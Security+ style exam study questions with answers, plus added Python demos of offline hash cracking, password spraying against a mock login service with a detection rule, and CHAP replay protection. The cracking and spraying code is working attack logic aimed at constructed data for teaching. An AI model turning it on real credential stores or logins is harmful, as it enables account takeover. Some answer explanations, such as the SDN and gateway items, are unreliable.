A security administrator protects systems passwords by hashing their related keys. The administrator discovers that this approach does not make the key any stronger or more difficult to crack. Analyze the different security properties and determine which one the administrator implemented. -Digital signatures -Key length -Key exchange -Key stretching

-Key stretching (Key stretching takes a key that is generated from a user password and repeatedly converts it to a longer and more random key.)

A threat actor can exploit an unauthenticated access to submit arbitrary directory queries using which type of attack? -SQL injection -LDAP injection -XML injection -DLL injection

-LDAP injection (A Lightweight Directory Access Protocol (LDAP) attack exploits either unauthenticated access or a vulnerability in a client app to submit arbitrary LDAP queries.)

The NIST Computer Security Incident Handling Guide describes six stages of the incident response lifecycle. Indicate in which stage of the incident response lifecycle the incident response team would review and analyze their response and possibly integrate changes into the team's Incident Response Plan. -Recovery -Preparation -Identification -Lessons learned

-Lessons learned (The "lessons learned" phase occurs when the team's response is evaluated. It is for this reason that it is important to document the entire response process.)

A large firm uses a non-persistent operating system for its remote users. This allows the employees to access company resources while teleworking. When the computers are turned off, the operating system disappears. Which of the following operating systems is the company using? -TPM -Full disk encryption -Live boot media -Trusted operating system

-Live boot media (Live boot media is a non-persistent operating system on a compact disk or USB. Live boot media can be run on any computer to provide the user a complete operating system while the computer is on.)

What would be the highest concern for an e-commerce company whose top priority is to ensure customers can shop online 24/7? -Loss of availability -Increase of fines -Increase of data breaches -Loss of reputation

-Loss of availability (Availability loss in this case is losing redundancy in applications and servers that host and run the e-commerce website. Service availability is important to an e-commerce company that advertises 24/7 services.)

An insider threat gained access to a server room and proceeded with connecting a laptop to the network. The laptop was configured with a spoofed network interface card (NIC) address to remain undetected by the network intrusion detection systems (IDS). What layer 2 attack can the insider threat perform to disrupt the network? -DNS poisoning -OT DDoS attack -MAC flooding -Domain hijacking

-MAC flooding (Media Access Control (MAC) flooding is a layer 2 network attack. It exhausts the memory used to store a MAC address table on a switch, which results in flooding unicast traffic out of all ports and disrupting all connecting devices and network services.)

Which of the following are deployed similarly to a credit card skimmer? -Keyloggers -Card cloner -Malicious USB plug -Malicious flash drive

-Malicious USB plug (A malicious Universal Serial Bus (USB) charging cable and plug are deployed similarly to card skimmers. The device may be placed over a public charging port at airports and other transit locations. The device can then access a smartphone when connected.)

An employee has authorized access to the company's system and intentionally misused the data from that system. What type of attack has occurred? -Social engineering -Passive reconnaissance -Impersonation -Malicious insider threat

-Malicious insider threat

Two organizations plan on forming a partnership to provide systems security services. Part of the onboarding requirements for both sides includes a mutual understanding of quality management processes. Which approach details this requirement? -Service level agreement (SLA) -Non-disclosure agreement (NDA) -Measurement systems analysis (MSA) -Business partnership agreement (BPA)

-Measurement systems analysis (MSA) (Measurement systems analysis (MSA) relates to quality management processes, such as Six Sigma, that make use of quantified analysis methods to determine the effectiveness of a system and may be part of an onboarding requirement.)

A security firm and an organization meet and agree to begin a business relationship. While a contract is not in place yet, what do the parties use to maintain confidentiality and as an intent to work together? -Service level agreement (SLA) -Business partnership agreement (BPA) -Measurement systems analysis (MSA) -Memorandum of understanding (MOU)

-Memorandum of understanding (MOU) (A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together. MOUs are usually intended to be relatively informal and not to act as binding contracts.)

A system administrator implements a process that provides two separate paths from each server node to every disk in a redundant array of inexpensive disks set up to remove a single point of failure. What concept has the administrator implemented? -Multipathing -Load balancing -Longevity -Fault tolerance

-Multipathing (Multipathing allows users to configure multiple input/output (I/O) paths between server nodes and storage arrays into a single device to remove a single point of failure and increase redundancy.)

Evaluate the properties and determine which describes the role of a gateway in an edge computing environment. -Provides the distribution and aggregation of data -Collects and depends upon data for their operation -Incorporated as a data processing layer -Performs some pre-processing of data to enable prioritization

-Performs some pre-processing of data to enable prioritization (Edge gateways perform some pre-processing of data to and from edge devices to enable prioritization. They also perform the wired or wireless connectivity to transfer data to and from the storage and processing networks.)

A user at an organization reports that their mobile payment method may have been hacked. A security engineer determines that a compromise must have occurred through card skimming. Which technology was used for mobile payments? -Bluetooth -Infrared -RFID -NFC

-NFC (Near field communications (NFC) is based on a particular type of radio frequency ID (RFID). NFC sensors and functionality are now commonly incorporated into smartphones. NFC is susceptible to skimming.)

Determine a solution that can combine with a cloud access security broker (CASB) to provide a wholly cloud-hosted platform for client access. -Virtual private cloud endpoint -Next-generation secure web gateway -Geo-redundant storage -On-demand machine resources

-Next-generation secure web gateway (An on-premises next-generation secure web gateway (SWG) is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet sites and services. Netskope is an example of an SWG product that can include a cloud access security broker (CASB).)

A company stages its computing power in a centralized environment. All workstations run off of one desktop hosted in the data center. When the admin makes changes at individual workstations, the changes only get saved locally, until a user signs off, and the system then reverts back to the previous state. What technology does this represent? -Type 1 hypervisor -Non-persistent VDE -Persistent VDE -Snapshot

-Non-persistent VDE (A non-persistent Virtual Desktop Environment (VDE) serves a central desktop image from a remote server. When a user logs on to the desktop, changes and completed work are not saved long term; as soon as the user logs off, the desktop reverts to the image held at the central location.)

A European company that offers subscription services has recently experienced a data breach wherein private data, including personally identifiable information (PII), was compromised. What step should be taken by the company to avoid regulatory fines or lawsuits? -Hide the occurrence of the breach. -Notify those affected by the breach. -Fix the vulnerability that led to the breach. -Identify the vulnerability that led to the breach.

-Notify those affected by the breach. (Many laws and regulations require prompt notification of the parties affected by a breach. Under the EU's GDPR, the supervisory authority must be notified within 72 hours of the company becoming aware of the breach, and the affected data subjects must be notified without undue delay when the breach is likely to put them at high risk. Failing to do so can lead to fines and reputational damage.)

There are several ways to check on the status of an online certificate, but some introduce privacy concerns. Consider how each of the following is structured and select the option with the best ability to hide the identity of the certificate requestor. -CRL -OCSP stapling -OCSP -OCSP responder

-OCSP stapling (Stapling addresses the privacy problem with the Online Certificate Status Protocol (OCSP): with plain OCSP the client queries the CA's responder directly, so the CA learns which sites each client visits. With stapling, the SSL/TLS web server periodically obtains a time-stamped, signed response from the CA's responder and attaches ("staples") it to the TLS handshake, so the client gets the revocation status without ever contacting the CA itself.)

A developer is concerned with Cross-Site Scripting (XSS) in the latest deployed version of an application. What should the developer refer to for information regarding critical application security risks? -NIST -AAA protocols -OWASP -FISMA

-OWASP (The Open Web Application Security Project (OWASP) is an online resource that provides resources for secure application development. It offers tools, networking, education, and training to the development community.)

An aviation tracking system maintains flight records for equipment and personnel. The system is a critical command and control system that must maintain an availability rate of 99% for key parameter performance. The cloud service provider (CSP) guarantees a failover to multiple zones if an outage occurs. In addition to the multi-zonal cloud failover, what other backup solution could the system invest in order to maintain data locally? -Offline -Vendor diversity -Control diversity -Sandboxing

-Offline (An offline backup solution safeguards the system's data locally and keeps it readily accessible in the event of a cloud outage, independent of the provider's multi-zonal failover.)

A file system audit shows a malicious account was able to obtain a password database. The malicious account will be able to use the information without interacting with an authentication system. What type of attack will the malicious account be able to perform on systems? -Online password attack -Password spraying attack -Offline password attack -Dictionary attack

-Offline password attack (An offline password attack means that the attacker has managed to obtain a database of password hashes from an Active Directory credential store, for example. A password cracker tool does not need to interact with the authentication system in this case.)
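
The contrast the explanation draws, cracking a stolen hash dump without ever contacting the authentication system, as an added example that is not part of the original study set. The usernames, passwords, wordlist and iteration count are constructed for illustration; the second half shows why per-user salts and a slow key derivation function (PBKDF2 here) make the same dump far more expensive to attack.

```python
"""Offline dictionary attack against a dumped credential store.

Added example; not from the original page. The usernames, passwords,
wordlist and iteration count below are constructed for illustration.
"""
import hashlib
import os
from typing import Dict, List, Tuple

# Constructed attacker wordlist (kept tiny so the example runs quickly).
WORDLIST: List[str] = ["123456", "password", "letmein", "qwerty", "Summer2023!"]


def sha256_hex(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed "stolen" dump of unsalted SHA-256 hashes: username -> hex digest.
UNSALTED_DUMP: Dict[str, str] = {
    "alice": sha256_hex("password"),
    "bob": sha256_hex("letmein"),
    "carol": sha256_hex("correct horse battery staple"),  # not in the wordlist
}


def crack_unsalted(dump: Dict[str, str], wordlist: List[str]) -> Dict[str, str]:
    """Hash every candidate once and match it against all users at once.

    Nothing here talks to an authentication system, so account lockout,
    rate limiting and login alerting never trigger: the only limit is CPU.
    """
    lookup = {sha256_hex(word): word for word in wordlist}
    return {user: lookup[digest] for user, digest in dump.items() if digest in lookup}


# Constructed dump of the same passwords stored with a per-user random salt
# and a slow KDF (PBKDF2-HMAC-SHA256), as a hardened credential store would do.
ITERATIONS = 50_000


def pbkdf2_hex(password: str, salt: bytes) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS).hex()


def salted_entry(password: str) -> Tuple[bytes, str]:
    salt = os.urandom(16)
    return salt, pbkdf2_hex(password, salt)


SALTED_DUMP: Dict[str, Tuple[bytes, str]] = {
    "alice": salted_entry("password"),
    "bob": salted_entry("letmein"),
    "carol": salted_entry("correct horse battery staple"),
}


def crack_salted(dump: Dict[str, Tuple[bytes, str]],
                 wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Per-user salts defeat the shared lookup table: every candidate must be
    re-derived for every user, and the KDF's iteration count multiplies the
    cost of each attempt. Returns (cracked, number_of_kdf_calls)."""
    cracked: Dict[str, str] = {}
    kdf_calls = 0
    for user, (salt, target) in dump.items():
        for word in wordlist:
            kdf_calls += 1
            if pbkdf2_hex(word, salt) == target:
                cracked[user] = word
                break
    return cracked, kdf_calls


if __name__ == "__main__":
    print("unsalted:", crack_unsalted(UNSALTED_DUMP, WORDLIST))
    cracked, calls = crack_salted(SALTED_DUMP, WORDLIST)
    print("salted:", cracked, "after", calls, "KDF calls")
```

Both passwords from the wordlist fall either way; the difference is that the unsalted dump costs five hashes in total, while the salted dump costs a full KDF run per user per candidate, which is what a real cracker like hashcat would be spending its time on.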

A company's infrastructure and resources are set up in a vault on the second floor of a building. The company is responsible for maintaining services and equipment. Which of the following best describes the company's cloud concept? -On-premise -Hybrid cloud -XaaS -Cloud computing

-On-premise (On-premises computing refers to infrastructure and resources that a company hosts and maintains at its own location. The company is responsible for managing and maintaining the assets.)

A user notices several new icons for unknown applications after downloading and installing a free piece of software. IT support determines that the applications are not malicious but are classified as which type of software? -PUPs -Trojans -Fileless viruses -Worms

-PUPs (Potentially unwanted programs (PUP) are software installed alongside a package selected by the user, or perhaps bundled with a new computer system.)

Conclude what type of data has high trade values in black markets, is often anonymized or deidentified for use in scientific research, and when compromised, can lead to its use in blackmail or insurance fraud, as well as cause reputational damage to the responsible organization. -Customer Data -Government Data -Financial Information -Personal health information (PHI)

-Personal health information (PHI) (Personal health information (PHI), such as medical and insurance records, laboratory test results, etc., has a high value in black markets because of its potential use for blackmail and insurance fraud. It is often anonymized and used for research.)

Systems administrators rely on ACLs to determine access to sensitive network data. What control type do the administrators implement? -Detective -Corrective -Preventative -Deterrent

-Preventative (Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. An ACL is an example of this control type.)

A systems admin deploys a new infrastructure for an organization. Examine the given descriptions and determine which applies to the technology used with the LDAP protocol. -Forward traffic from one node to another -Resolves names to IP addresses -Provides privilege management and authorization -Automatic method for network address allocation

-Provides privilege management and authorization (Directory services are the principal means of providing privilege management and authorization on an enterprise network. The Lightweight Directory Access Protocol (LDAP) is a protocol used with X.500 format directories.)

Verify the terminology that describes the action of isolating a system or file in order to contain a worm or virus. -Quarantine -Block -Delete -Alert

-Quarantine (Data loss prevention software can deny the offending user(s) access to the original file. The software accomplishes this by encrypting the file in place, or by moving the file to an area isolated from access. This is quarantining a file.)

IT management wants to make it easier for users to request certificates for their devices and web services. The company has multiple intermediate certificate authorities spread out to support multiple geographic locations. In a full chain of trust, which entity would be able to handle processing certificate requests and verifying requester identity? -CSR -RA -CA -OCSP

-RA (A Registration Authority (RA) is a function of certificate enrollment and its services would be combined with a Certificate Authority (CA) in a single CA hierarchy. An RA is responsible for validating and submitting a request on behalf of end users.)

A Local Area Network (LAN) is set up with an Authentication, Authorization, and Accounting (AAA) server. The AAA server allows remote supplicants to access the LAN through a Network Access Point (NAP). Which of the following best describes the type of remote authentication solution that is set up on the LAN? -RADIUS -802.1x -EAP -PAP

-RADIUS (A Remote Authentication Dial-In User Service (RADIUS) solution is made up of the Authentication, Authorization, and Accounting (AAA) server, the Network Access Control (NAC) device acting as the RADIUS client, and the supplicant. A supplicant is any device that is trying to access the local network remotely.)

A connection cannot be established during a network connection test of a newly deployed WAP (Wireless Access Point) in WPA2 Enterprise (Wi-Fi Protected Access) mode. After checking the wireless controller, the 802.1x option was selected, but another configuration setting did not save. Apply knowledge of the network connection process to determine which of the following did not save. -Enterprise option -Open configuration -EAP authentication option -RADIUS server settings

-RADIUS server settings (A RADIUS (Remote Authentication Dial-In User Service) server is required to complete the 802.1X setup. The wireless controller must be configured with the RADIUS server's address and a shared secret; only then can it forward supplicant credentials to the server for authentication.)

Evaluate the following properties and determine which set relates to Domain Name System Security Extension (DNSSEC). -Community name, Agent -Public key, Private key -RRset, Signing key -Master key, Transport protocol

-RRset, Signing key (DNS Security Extensions (DNSSEC) help to mitigate spoofing and poisoning attacks. When enabled, a "package" of resource records (called an RRset) is signed with a private key (the Zone Signing Key).)

A cardiovascular patient is sent home with a monitoring device that records and sends data to a healthcare provider when triggered by abnormal cardiac activity. Response time to the data is critical to patient health. Which embedded platform is the medical device using? -Distributed -Real-time -Standalone -Networked

-Real-time (A real-time operating system (RTOS) is in an embedded system intended to serve real-time applications that process data as it comes in. It provides a quicker reaction to external events than a typical operating system.)

An electronic company wants to begin developing a better and faster way to transfer data and power devices over a single cable for general consumer use at home and via the internet. The engineers will need to review current best practices on how data and power are transferred on the wire today. Which of the following activities will provide these engineers with the best information that will support the project? -Review Request for Comments (RFC). -Ask a local competitor. -Attend industry conferences. -Read academic journals.

-Review Request for Comments (RFC). (Request for Comments (RFC) are publications from the Internet Engineering Task Force (IETF) and other related bodies or organizations that detail how certain technologies are used and their best practices. For example, RFC 894 is "A Standard for the Transmission of IP Datagrams over Ethernet Networks.")

Recommend an immediate response that does not require generating new certificates in a scenario where an attacker has compromised a host on a network by spoofing digital certificates. -Install a content filter -Remove all root certificates from host -Install a data loss prevention system -Revoke the host's certificate

-Revoke the host's certificate (Certificate revocation must always be performed if the associated host is compromised. Revoking the certificate with the Key Compromise reason code invalidates it immediately; the certificate can later be rekeyed so that the replacement retains the same subject and expiry information.)

A company shares an external drive that allows members to collaborate documentation and products to work simultaneously. The CIO enforces a rule that some users can download files to their local desktop while others can only view files. This is an example of which type of data protection? -Rights management -Least privileged -ABAC -PAM

-Rights management (Rights management allows a rights owner to exert control over data. It enables publishers of information to control what recipients can do with it to prevent unauthorized sharing and data control.)

A company wants to implement a control model that dictates access based on attributes. The company would like to reconfigure the network by making changes from executable files instead of physically reconfiguring. Which of the following should the company implement? -Location-based policy -Least privilege -SDN -RBAC

-SDN (A software defined network (SDN) separates data and control planes in a network. It uses an attribute-based access control (ABAC) that identifies subjects and objects within a policy.)

A network uses a framework for management and monitoring that uses the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES), which encrypts the contents of traps and query responses. Analyze the types of protocols available for management and monitoring, then deduce the protocol utilized. -MIB -SNMPv1 -SNMPv3 -SNMPv2c

-SNMPv3 (Simple Network Management Protocol (SNMP) v3 supports encryption and strong user-based authentication. Instead of community names, the agent is configured with a list of usernames and access permissions.)

An IT technician at a London-based company is setting up a new VoIP system in the CEO's office. The CEO has asked the technician to set up encryption for calls, and the technician informs the CEO that session-to-session encryption is implemented at the endpoints. The CEO wants not only the session encrypted but also the call data itself. Recommend a protocol that will encrypt VoIP call data. -HTTPS -SRTP -SIPS -SFTP

-SRTP (Secure Real-time Transport Protocol (SRTP) provides encryption and authentication for the Real-time Transport Protocol (RTP) media stream in unicast and multicast flows. SIPS protects only the call-setup signaling; SRTP encrypts the call data itself for the entire journey between the SIP endpoints.)

Finance representatives at an organization meet professional standards by providing reports that are highly detailed and designed to be restricted. As members of the American Institute of Certified Public Accountants (AICPA), which standards do the finance representatives follow? -SSAE SOC 2 Type III -SSAE SOC 2 Type II -International Organization for Standardization (ISO) 27K -International Organization for Standardization (ISO) 31000

-SSAE SOC 2 Type II (A Service Organization Control (SOC2) Type II report assesses the ongoing effectiveness of the security architecture over a period of 6-12 months. SOC2 reports are highly detailed and designed to be restricted.)

A system administrator has a file on a Linux server that needs transferring to a client. While working on the client, what tool will the system administrator likely use to complete this task? -Telnet -Remote Desktop -Virtual Private Network -Secure Shell

-Secure Shell (Secure Shell (SSH) is the principal means of obtaining secure remote access to UNIX and Linux servers. Its main uses are remote administration and secure file transfer via the SSH File Transfer Protocol (SFTP) or scp.)

A data exfiltration attack at a well-known retail company exposes a great deal of private data to the public. A portion of the data details the CEO's political and religious affiliations. When considering data classification types, which has been exposed? -Proprietary -Sensitive -Critical -Confidential

-Sensitive (A sensitive label is usually used in the context of personal data. This is privacy-sensitive information about a subject that could harm them if made public and could prejudice decisions made about them.)

Routine analysis of technical security controls at an organization prompts a need for change. One such change is the addition of Network Intrusion Detection System (NIDS) technology. A firewall that supports this function is on order. Considering how the organization will implement NIDS, what other technology completes the solution? -Static code analyzers -Correlation engines -Sensors -Aggregation switches

-Sensors (Sensors gather information to determine if the data being passed is malicious or not. The internet-facing sensor will see all traffic and determine its intent. The sensor behind the firewall will only see filtered traffic. The sensors send findings to the NIDS console.)

An organization receives numerous negative reviews on social media platforms in response to a recent public statement. Experts use machine learning to identify any threatening language. Which approach do the experts use to identify security risks? -Security monitoring -Sentiment analysis -Threat feeds -User behavior analysis

-Sentiment analysis (Sentiment analysis is used to monitor social media for incidents, such as disgruntled consumers posting negative content. In terms of security, this can be used to gather threat intelligence.)

In regards to performing forensic investigation in public clouds, what document would contain the right to audit clause, giving the investigator the authority to audit files on the network? -Forensic reports -Checksums -Service-level agreements (SLA) -Pagefile

-Service-level agreements (SLA) (A Service Level Agreement (SLA) is a formal agreement that lays out the detailed conditions in which the service is rendered. These could include terms and conditions for security access controls and risk evaluations, plus authentication criteria for proprietary and private data.)

A user calls to request assistance connecting to the company's free guest Wi-Fi access point. The user is selecting the correct "Guest WIFI" wireless name from a brand new Windows 10 laptop. How can the user gain proper access to the Internet? -Get a public key certificate -Request to disable AP isolate -Change laptop's connection method -Sign on to the web portal

-Sign on to the web portal (The web portal, also known as a captive portal, is a web page a client is automatically directed to when connecting to a network, usually through public Wi-Fi.)

Select the type of incident response exercise that involves recreating system interfaces or using emulators to allow students to practice configuration tasks, or even practice with other trainees to mimic real-time attack scenarios. -Simulations -Tabletop -Walkthrough -Capture the Flag

-Simulations (Simulation is an activity in which two teams replicate a scenario and play the scenario out on real hardware, with one team representing the attackers, and the other team representing the response team.)

A developer uses a prepackaged set of tools that includes documentation, application programming interfaces (APIs), code samples, and libraries to easily integrate an application with the company Linux operating system. Which secure coding process is the developer using? -Code reuse -APIs -Stored procedure -Software development kit (SDK)

-Software development kit (SDK) (A software development kit (SDK) provides developers a prepackaged set of tools, libraries, documentation, and code samples to create software applications on a specific platform.)

An organization configures virtual network appliances as part of an infrastructure as code (IaC) deployment. What approach handles the near real-time collection, aggregation, and reporting of data of the implementation? -Software-defined networking (SDN) -Network controller application APIs -Software-defined visibility (SDV) -Network functions virtualization (NFV)

-Software-defined visibility (SDV) (Software-defined visibility (SDV) supports assessment and incident response functions. Visibility is the near real-time collection, aggregation, and reporting of data about network traffic.)

Which attack is a brute-force type that mixes common passwords with usernames? -Dictionary -Spraying -Skimming -Rainbow

-Spraying (Password spraying is a horizontal brute-force online attack. The attacker chooses one or a few common passwords (for example, "password") and tries each one against many usernames, so that no single account accumulates enough failures to trigger lockout.)
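
A mock login service with account lockout, attacked first vertically (many passwords against one user) and then by spraying (one password across all users), followed by the detection rule that does catch a spray. This is an added example and not part of the original study set; the user directory, passwords, source address and lockout threshold are constructed.

```python
"""Password spraying versus vertical brute force against a mock login
service with account lockout, plus a simple spray detection over its log.

Added example; not from the original page. The user directory, passwords,
source address and thresholds are constructed for illustration.
"""
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

LOCKOUT_THRESHOLD = 5  # failed attempts before an account locks

# Constructed directory: several users share seasonal or trivial passwords.
DIRECTORY: Dict[str, str] = {
    "alice": "Winter2023!",
    "bob": "password",
    "carol": "Summer2023!",
    "dave": "Summer2023!",
    "erin": "Xk9#vL2pQr!",
}

LogEntry = Tuple[str, str, str]  # (source_ip, username, outcome)


class MockAuthService:
    """Online authentication endpoint with a per-account lockout counter."""

    def __init__(self, directory: Dict[str, str]) -> None:
        self.directory = directory
        self.failures: Dict[str, int] = defaultdict(int)
        self.locked: Set[str] = set()
        self.log: List[LogEntry] = []

    def login(self, src_ip: str, user: str, password: str) -> str:
        if user in self.locked:
            self.log.append((src_ip, user, "LOCKED"))
            return "LOCKED"
        if self.directory.get(user) == password:
            self.failures[user] = 0
            self.log.append((src_ip, user, "SUCCESS"))
            return "SUCCESS"
        self.failures[user] += 1
        if self.failures[user] >= LOCKOUT_THRESHOLD:
            self.locked.add(user)
        self.log.append((src_ip, user, "FAIL"))
        return "FAIL"


def vertical_brute_force(svc: MockAuthService, src_ip: str, user: str,
                         candidates: List[str]) -> Optional[str]:
    """Many passwords against one account: the lockout trips long before the
    list is exhausted, and even the correct password is then refused."""
    for pw in candidates:
        if svc.login(src_ip, user, pw) == "SUCCESS":
            return pw
    return None


def password_spray(svc: MockAuthService, src_ip: str, users: List[str],
                   common_passwords: List[str]) -> Dict[str, str]:
    """A few common passwords against every account, one password per round,
    so no single account accumulates enough failures to lock."""
    found: Dict[str, str] = {}
    for pw in common_passwords:
        for user in users:
            if user in found:
                continue
            if svc.login(src_ip, user, pw) == "SUCCESS":
                found[user] = pw
    return found


def detect_spray(log: List[LogEntry], min_distinct_users: int = 3) -> Set[str]:
    """Detection rule: one source failing against many distinct accounts.
    Per-account lockout counters never fire on a spray; correlating failures
    by source address does."""
    failed_users: Dict[str, Set[str]] = defaultdict(set)
    for src_ip, user, outcome in log:
        if outcome == "FAIL":
            failed_users[src_ip].add(user)
    return {ip for ip, users in failed_users.items() if len(users) >= min_distinct_users}


if __name__ == "__main__":
    svc = MockAuthService(DIRECTORY)
    guesses = ["123456", "password", "qwerty", "letmein", "abc123", "Xk9#vL2pQr!"]
    print("brute force on erin:", vertical_brute_force(svc, "198.51.100.7", "erin", guesses),
          "locked:", sorted(svc.locked))
    svc = MockAuthService(DIRECTORY)
    hits = password_spray(svc, "198.51.100.7", list(DIRECTORY),
                          ["password", "Summer2023!", "Winter2023!"])
    print("spray hits:", hits, "locked:", sorted(svc.locked), "flagged:", detect_spray(svc.log))
```

The vertical attack locks erin after five guesses and never gets in even though the sixth guess is right; the spray compromises four of five accounts with three passwords and leaves every lockout counter below the threshold. Only a rule that counts distinct usernames per source flags it, which is why spraying shows up in SIEM correlation rather than in per-account lockout alerts.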

A test team performs an in-depth review of completed code and analyzes its compatibility with the environment it will be deployed to. Which of the following environments is the test occurring in? -Test -Staging -Production -Development

-Staging (A staging environment mimics that of a production environment. It is used for dynamic analysis of an application in a complete but separate production-like environment.)

Experts at a scientific facility suspect that operatives from another government entity have planted malware and are spying on one of their top-secret systems. Based on the attacker's location and likely goals, which attacker type is likely responsible? -Script kiddies -State actors -Criminal syndicates -Hacktivists

-State actors (State actors have been implicated in many attacks, particularly on energy and health network systems. They typically work at arm's length from the national government that sponsors and protects them, maintaining "plausible deniability.")

Which of the following practices would help mitigate the oversight of applying coding techniques that will secure the code of an internal application for a company? -Normalization -Input validation -Dead code removal -Static code analysis

-Static code analysis (Static code analysis examines source code without executing it. An analysis tool that supports the language scans the code for signatures of known weaknesses, such as missing input validation or unsafe function calls, catching oversights, mistaken assumptions, or gaps in the developer's knowledge that coding guidelines alone would miss. It complements, rather than replaces, manual peer review.)

A stratum 2 time server obtains routinely updated time to ensure accuracy. Evaluate the Network Time Protocol (NTP) and conclude which device provided the updates. -Stratum 2 -Stratum 3 -Atomic Clock -Stratum 1

-Stratum 1 (A stratum 2 server obtains its time from a stratum 1 server, which in turn is synchronized directly to a reference clock such as an atomic clock. Lower stratum numbers are closer to the reference; a server always receives time from a server at the next lower stratum.)

A recent attack on a major retail chain reported that customers' private information, including credit card information, was stolen. The report explained that a heating, ventilation, and air conditioning (HVAC) contractor copied the information to an external hard drive while servicing an air conditioner unit, and later uploaded the data to a cloud storage resource. A security engineer would classify this type of attack as which of the following? -Cloud-based attack -USB cable attack -Birthday attack -Supply chain attack

-Supply chain attack (A supply chain attack involves a threat actor seeking methods to infiltrate a company in its supply chain. A heating, ventilation, and air conditioning (HVAC) supplier is one example of using a maintenance service to gain access to sensitive areas like a datacenter.)

Which type of service account has the most privileges? -Local service -Group service -System -Network service

-System (The System account has the most privileges of any Windows account. This account creates the host processes and systems that receive full privileges to local computers. Local service accounts have the same privileges as standard user accounts.)

A tech considers installing either a Raspberry Pi or Arduino system inside a small enclosure as a control device for sensitive tasks. The utilization of this technology is an example of which embedded system type? -Programmable Logic Controller (PLC) -Field Programmable Gate Array (FPGA) -System on Chip (SoC) -Real-Time Operating System (RTOS)

-System on Chip (SoC) (System on chip (SoC) is a design where processors, controllers, and devices are provided on a single processor die (or chip). Raspberry Pi and Arduino are examples of SoC boards.)

A network administrator researched Secure Sockets Layer/Transport Layer Security (SSL/TLS) versions to determine the best solution for the network. Security is a top priority along with a strong cipher. Recommend the version to implement, which will meet the needs of the company. -SSL 2.0 -SSL 3.0 -TLS 1.2 -TLS 1.1

-TLS 1.2 (Of the listed versions, Transport Layer Security (TLS) 1.2 is the only one that should still be deployed; SSL 2.0, SSL 3.0, and TLS 1.1 are all deprecated. TLS 1.2 replaced the MD5/SHA-1 combination with SHA-256 in its pseudorandom function and signatures, added support for authenticated-encryption (AEAD) cipher suites such as AES-GCM, and improved cipher suite negotiation and protection against known attacks.)

A network tech is installing an intrusion detection system (IDS) on a corporate network. The system is intended to be a long-term monitoring solution and would ideally split or copy network signals on the physical layer to avoid frame loss. Anticipate the type of sensor the tech will install in conjunction with the IDS. -Test access point (TAP) -SNMP trap -Bandwidth monitor -SPAN (switched port analyzer)

-Test access point (TAP) (A test access point (TAP) is a device that copies signals from the physical layer and the data link layer. Since no network or transport logic is used, every frame is received, allowing reliable packet monitoring.)

In what way does Challenge Handshake Authentication Protocol (CHAP) protect against replay attacks? -The handshake is repeated with different challenge messages periodically throughout the session connection. -Mutual authentication is performed every time the handshake is initiated and repeated throughout the session. -The challenge is different every time a user authenticates to the server. -The client responds with a hash calculated from the server challenge message and a shared secret.

-The handshake is repeated with different challenge messages periodically throughout the session connection. (In CHAP, the handshake is repeated with different challenge messages throughout the session, which updates the session timestamp and guards against replay attacks.)
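
The exchange described above, both sides of it, as an added example that is not part of the original study set: the authenticator issues a random challenge, the peer answers with MD5(Identifier || secret || Challenge) as RFC 1994 specifies, and a response recorded off the wire fails when it is replayed against the next periodic challenge. The shared secret, challenge length and identifiers are constructed.

```python
"""CHAP (RFC 1994) three-way handshake with periodic re-challenge, and a
replay attempt that fails because each challenge is fresh.

Added example; not from the original page. The shared secret, identifiers
and challenge size are constructed for illustration.
"""
import hashlib
import hmac
import os
from typing import List, Optional, Tuple

SHARED_SECRET = b"constructed-secret-provisioned-out-of-band"


def chap_response(identifier: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 response value: MD5 over Identifier (one octet) || secret || challenge.
    MD5 is what the protocol specifies; it is not a choice made here."""
    return hashlib.md5(bytes([identifier & 0xFF]) + secret + challenge).digest()


class ChapAuthenticator:
    """Server side: issues challenges and checks responses."""

    def __init__(self, secret: bytes) -> None:
        self.secret = secret
        self.identifier = 0
        self.outstanding: Optional[bytes] = None

    def challenge(self) -> Tuple[int, bytes]:
        """Step 1: send a new Identifier and a random Challenge value."""
        self.identifier = (self.identifier + 1) & 0xFF
        self.outstanding = os.urandom(16)
        return self.identifier, self.outstanding

    def verify(self, identifier: int, response: bytes) -> bool:
        """Step 3: recompute the expected hash and compare in constant time.
        The outstanding challenge is consumed whether or not the check passes,
        so a given response can never be accepted twice."""
        if self.outstanding is None or identifier != self.identifier:
            return False
        expected = chap_response(identifier, self.secret, self.outstanding)
        self.outstanding = None
        return hmac.compare_digest(expected, response)


class ChapPeer:
    """Client side: proves knowledge of the secret without sending it."""

    def __init__(self, secret: bytes) -> None:
        self.secret = secret

    def respond(self, identifier: int, challenge: bytes) -> bytes:
        """Step 2: return MD5(Identifier || secret || Challenge)."""
        return chap_response(identifier, self.secret, challenge)


def run_session(server: ChapAuthenticator, peer: ChapPeer, rehandshakes: int = 2) -> List[bool]:
    """Initial handshake followed by periodic re-challenges during the session."""
    outcomes = []
    for _ in range(1 + rehandshakes):
        ident, chal = server.challenge()
        outcomes.append(server.verify(ident, peer.respond(ident, chal)))
    return outcomes


def replay_attack(server: ChapAuthenticator, peer: ChapPeer) -> Tuple[bool, bool]:
    """An eavesdropper records a valid (Identifier, Response) pair and replays it
    when the server re-challenges. Returns (legitimate_result, replay_result)."""
    ident, chal = server.challenge()
    recorded = peer.respond(ident, chal)            # captured off the wire
    legitimate = server.verify(ident, recorded)
    next_ident, _ = server.challenge()              # fresh challenge for the re-handshake
    replayed = server.verify(next_ident, recorded)  # old response, new challenge
    return legitimate, replayed


if __name__ == "__main__":
    server, peer = ChapAuthenticator(SHARED_SECRET), ChapPeer(SHARED_SECRET)
    print("session handshakes:", run_session(server, peer))
    print("(legitimate, replayed):", replay_attack(server, peer))
```

The replay fails for two independent reasons: the recorded hash was computed over a challenge that no longer exists, and the authenticator discards each challenge the moment it is checked. The caveat a practitioner should keep in mind is that the authenticator must hold the secret in plaintext to recompute the hash, and the hash itself is MD5, which is why EAP methods and MS-CHAPv2 replaced plain CHAP in most deployments.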

